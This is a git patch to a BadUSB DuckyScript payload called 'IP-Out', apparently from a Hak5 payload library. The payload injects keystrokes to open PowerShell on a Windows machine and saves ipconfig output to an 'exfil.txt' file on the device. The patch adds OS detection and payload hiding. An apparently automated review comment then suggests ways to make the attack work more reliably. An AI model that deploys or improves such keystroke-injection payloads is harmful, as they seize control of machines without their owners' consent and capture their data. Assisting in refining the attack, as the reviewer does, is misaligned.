From 0f85a6936e8f97b6947101928e5689d5f90b8b23 Mon Sep 17 00:00:00 2001
From: Mavis Coffey <129871621+mavisinator30001@users.noreply.github.com>
Date: Thu, 26 Sep 2024 06:09:19 -0700
Subject: [PATCH] Update payload.txt
---
 .../library/credentials/IP-Out/payload.txt | 55 ++++++++++++++++---
 1 file changed, 47 insertions(+), 8 deletions(-)
diff --git a/payloads/library/credentials/IP-Out/payload.txt b/payloads/library/credentials/IP-Out/payload.txt
index 41481a9..8b2dc8e 100644
--- a/payloads/library/credentials/IP-Out/payload.txt
+++ b/payloads/library/credentials/IP-Out/payload.txt
@@ -2,20 +2,59 @@ REM Title: IP-Out
 REM Author: Mavisinator30001
 REM Description: Opens a powershell window and prints the current IP of the device to a text file in the BadUSB
 REM Target: Any Windows System
-REM DISCLAIMER!!! Neither I, nor Hack5, condone any unethical hacking practices using this payload... FOR EDUCATIONAL PURPOSES ONLY
+REM DISCLAIMER!!! Neither I, nor Hak5, condone any unethical hacking practices using this payload... FOR EDUCATIONAL PURPOSES ONLY
+DEFINE #DRIVELABEL D
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
 ATTACKMODE HID STORAGE
 DELAY 500
 GUI r
 DELAY 300
-STRING Powershell
-ENTER
+STRINGLN Powershell
 DELAY 1000
-STRING ipconfig | Out-File -Filepath D:\exfil.txt -Encoding utf8
-ENTER
+STRINGLN ipconfig | Out-File -Filepath #DRIVELABEL:\exfil.txt -Encoding utf8
 WAIT_FOR_STORAGE_ACTIVITY
 WAIT_FOR_STORAGE_INACTIVITY
 ALT F4
 ATTACKMODE OFF
-REM And should the attacker want to make sure the payload was successful:
-WAIT_FOR_BUTTON_PRESS
-ATTACKMODE STORAGE
+HIDE_PAYLOAD
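Review bot: The PASSIVE_WINDOWS_DETECT extension sets `$_OS`, but nothing after `END_EXTENSION` reads it, so the `GUI r` / `STRINGLN` sequence is still typed into whatever host the device is attached to, even when detection ends at NOT_WINDOWS. Wrap the keystroke section in the guard the extension's own example shows, `IF ($_OS == WINDOWS) THEN` … `END_IF`, so a non-Windows machine receives no injected input. Separately, `#DRIVELABEL` holds a drive letter rather than a volume label; a name such as `#DRIVELETTER` plus a comment like `REM Drive letter the host is expected to assign to the device storage` would say what the value is. The header `REM` lines also still describe only the file write; they should mention that the payload now ends with `HIDE_PAYLOAD` and no longer waits for a button press, so someone auditing the device knows what state it is left in.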